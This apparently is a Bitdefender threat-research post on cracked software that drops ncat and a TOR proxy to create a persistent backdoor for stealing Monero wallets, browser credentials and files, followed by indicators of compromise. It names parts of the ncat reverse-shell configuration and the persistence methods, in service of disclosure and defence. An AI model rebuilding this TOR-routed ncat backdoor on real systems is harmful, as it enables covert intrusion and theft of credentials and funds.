From Cracks to Empty Wallets – How Popular Cracks Lead to Digital Currency and Data Theft
For about three years, hackers have been stealing cryptocurrency from victims’ Monero wallets using powerful malware delivered through software cracks for popular apps.
Cracks and patches have been around since the advent of commercial software. Easy to use and widely available on specialized sharing websites, these small apps let people bypass commercial protections in popular software and use applications without paying for them. However, besides the legal implications of unauthorized software use, the cyber-security risks are serious.
Bitdefender analysts have recently uncovered a series of attacks that leverage office tools and image-editing software cracks to compromise computers, hijack crypto-currency wallets and exfiltrate information via the TOR network.
Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a TOR proxy. The Netcat and TOR proxy files are dropped on disk as either
%syswow64%\ndc.exe for the first one and
%syswow64\tarsrv.exe for the latter. Additionally, a batch file is dropped at
%syswow64%\chknap.bat (for nap.exe) and
%syswow64%\nddcf.cmd (for ndc.exe) that contains the command-line for the Ncat component, which cycles through ports 8000 to 9000 on a .onion domain, as shown in the screenshot below.
The tools work together to create a powerful backdoor that communicates through TOR with its command and control center: the ncat binary uses the listening port of the TOR proxy (`–proxy 127.0.0.1:9075`) and uses the standard
–exec parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior).
The crack creates persistence mechanisms for the TOR proxy file and the Ncat binary on the machine with a service and a scheduled task that runs every 45 minutes, respectively. Our investigation reveals that – most likely – the backdoor is being used interactively by a human operator rather than sending automated requests to the victims. Some of the actions we observed are:
- File exfiltration. Ncat can receive local files to send over TOR to the command and control centers.
- BitTorrent client execution. We believe attackers are using BitTorrent clients to exfiltrate data.
- Turning off the firewall in preparation for data exfiltration.
- Theft of Firefox browser profile data (history, credentials and session cookies). Before exfiltration, attackers archive the profile folder with 7zip to generate one file that contains everything.
- Theft of the Monero wallet via the legitimate CLI client
This list of actions is non-exhaustive, as attackers have complete control of the system and can adapt campaigns based on their current interests.
Indicators of Compromise
%SYSWOW64%\ncat.exe %SYSWOW64%\ndc.exe %SYSWOW64%\chknap.bat %SYSWOW64%\nddcf.cmd %SYSWOW64%\tarsrv.exe %SYSTEM32%\ncat.exe %SYSTEM32%\ndc.exe %SYSTEM32%\tarsrv.exe %SYSTEM32%\nddcf.cmd %SYSTEM32%\tarsrv.exe
Ncat-executing batch file:
LuminousMoth – PlugX, File Exfiltration and Persistence Revisited
July 21, 2021
How We Tracked a Threat Group Running an Active Cryptojacking Campaign
July 14, 2021
A Note from the Bitdefender Labs Team on Ransomware and Decryptors
May 26, 2021
New Nebulae Backdoor Linked with the NAIKON Group
April 28, 2021
Good riddance, GandCrab! We’re still fixing the mess you left behind.
June 17, 2019